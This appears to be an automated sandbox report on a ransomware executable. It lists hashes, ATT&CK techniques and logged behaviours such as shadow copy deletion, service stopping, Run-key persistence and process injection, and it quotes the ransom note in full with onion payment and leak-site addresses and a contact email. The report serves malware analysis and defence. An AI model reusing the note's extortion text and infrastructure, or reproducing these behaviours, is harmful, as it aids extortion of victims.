22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3

Analysis

max time kernel
154s
max time network
149s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
24-11-2022 15:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
Size

7KB
MD5

6cb1d245920799a1cc2dd8ee69e052d8
SHA1

29ff603adab927d52c4e9ec2746857ae26bdccc0
SHA256

22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3
SHA512

3d71f7380502281fd05bb57098bddc506b000c41b1ff89572282709f0dbc2b508d2e75d2157c4562ea2f6b8e9eea42006c01d8002ba142387865856ac7c52d99
SSDEEP

192:B/wgnOh5hs9+w226iGrk3wi3OV5Yi3zMWu3Wg:B/wgnx9+wAKwi3OVGi3zMWu3W

Score

10^/10

discovery evasion persistence ransomware

Malware Config

Extracted

Path

C:\FILE RECOVERY.txt

Ransom Note

Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CA1E583578401B545E6AEAE7 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: [email protected] Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site.�

Emails

[email protected]

URLs

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Modifies file permissions 1 TTPs 18 IoCs

discovery

File Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
4856	takeown.exe
4368	takeown.exe
4880	takeown.exe
5084	takeown.exe
524	takeown.exe
4900	takeown.exe
4232	takeown.exe
744	takeown.exe
4396	takeown.exe
2232	takeown.exe
5088	takeown.exe
4312	takeown.exe
1824	takeown.exe
4160	takeown.exe
1332	takeown.exe
2196	takeown.exe
2360	takeown.exe
2396	takeown.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\Avbvlox = "\"C:\\Users\\Admin\\AppData\\Roaming\\Tntljlcbp\\Avbvlox.exe\""	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe

description	ioc	process
File opened (read-only)	\??\P:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\S:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\U:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\X:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\Z:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\A:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\H:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\I:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\J:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\O:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\Y:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\T:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\V:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\E:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\G:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\K:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\L:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\M:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\R:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\B:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\F:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\N:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\Q:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened (read-only)	\??\W:	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

8 api.ipify.org

flow	ioc
8	api.ipify.org

Suspicious use of SetThreadContext 1 IoCs

Processes:

22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe

description	pid	process	target process
PID 2124 set thread context of 5036	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe

Drops file in Program Files directory 64 IoCs

Processes:

22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe

description	ioc	process
File created	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_OEM_Perp-ul-oob.xrm-ms	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files\VideoLAN\VLC\locale\de\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Speech\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTest-pl.xrm-ms	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ar-ae\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\root\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ko-kr\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\MSQRY32.CHM	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fi-fi\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_w1\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_Retail-ppd.xrm-ms	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SATIN\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-ul-phn.xrm-ms	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_2017.131.1904.0_neutral_~_8wekyb3d8bbwe\microsoft.system.package.metadata\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\logger\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\microsoft.system.package.metadata\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\7-Zip\Lang\el.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hy.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_Retail-pl.xrm-ms	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TEXTCONV\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\de-de\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sv.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-ma\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SPRING\FILE RECOVERY.txt	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
4240	sc.exe
4840	sc.exe
4504	sc.exe
4392	sc.exe
2428	sc.exe
2248	sc.exe
4024	sc.exe
3284	sc.exe
4580	sc.exe
2616	sc.exe
3444	sc.exe
2928	sc.exe
3360	sc.exe
1944	sc.exe
3316	sc.exe
4736	sc.exe
2516	sc.exe
4160	sc.exe
4428	sc.exe
4880	sc.exe
4508	sc.exe
5088	sc.exe
2224	sc.exe
4820	sc.exe
3196	sc.exe
1508	sc.exe
4960	sc.exe
2884	sc.exe
4808	sc.exe
5012	sc.exe
2016	sc.exe
2692	sc.exe
1280	sc.exe
4404	sc.exe
920	sc.exe
4688	sc.exe
4044	sc.exe
4248	sc.exe
2176	sc.exe
4952	sc.exe
2204	sc.exe
1584	sc.exe
1980	sc.exe
4232	sc.exe
204	sc.exe
4692	sc.exe
4656	sc.exe
4376	sc.exe
2664	sc.exe
4896	sc.exe
2196	sc.exe
3848	sc.exe
4344	sc.exe
3304	sc.exe
3492	sc.exe
2036	sc.exe
408	sc.exe
5112	sc.exe
1580	sc.exe
4596	sc.exe
1008	sc.exe
2640	sc.exe
3260	sc.exe
4488	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

760 vssadmin.exe

pid	process
760	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe

pid	process
2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
5036	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
5036	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exetakeown.exe22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exevssvc.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
Token: SeTakeOwnershipPrivilege	4160	takeown.exe
Token: SeTakeOwnershipPrivilege	5036	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
Token: SeDebugPrivilege	5036	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
Token: SeBackupPrivilege	2404	vssvc.exe
Token: SeRestorePrivilege	2404	vssvc.exe
Token: SeAuditPrivilege	2404	vssvc.exe
Token: SeTakeOwnershipPrivilege	4396	takeown.exe
Token: SeTakeOwnershipPrivilege	1332	takeown.exe
Token: SeTakeOwnershipPrivilege	4856	takeown.exe
Token: SeTakeOwnershipPrivilege	4880	takeown.exe
Token: SeTakeOwnershipPrivilege	4312	takeown.exe
Token: SeTakeOwnershipPrivilege	5084	takeown.exe
Token: SeTakeOwnershipPrivilege	2396	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.execmd.exe22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe

description	pid	process	target process
PID 2124 wrote to memory of 1184	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	cmd.exe
PID 2124 wrote to memory of 1184	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	cmd.exe
PID 2124 wrote to memory of 1184	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	cmd.exe
PID 1184 wrote to memory of 4952	1184	cmd.exe	reg.exe
PID 1184 wrote to memory of 4952	1184	cmd.exe	reg.exe
PID 1184 wrote to memory of 4952	1184	cmd.exe	reg.exe
PID 1184 wrote to memory of 4160	1184	cmd.exe	takeown.exe
PID 1184 wrote to memory of 4160	1184	cmd.exe	takeown.exe
PID 1184 wrote to memory of 4160	1184	cmd.exe	takeown.exe
PID 2124 wrote to memory of 3212	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
PID 2124 wrote to memory of 3212	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
PID 2124 wrote to memory of 3212	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
PID 2124 wrote to memory of 4984	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
PID 2124 wrote to memory of 4984	2124	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe	22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
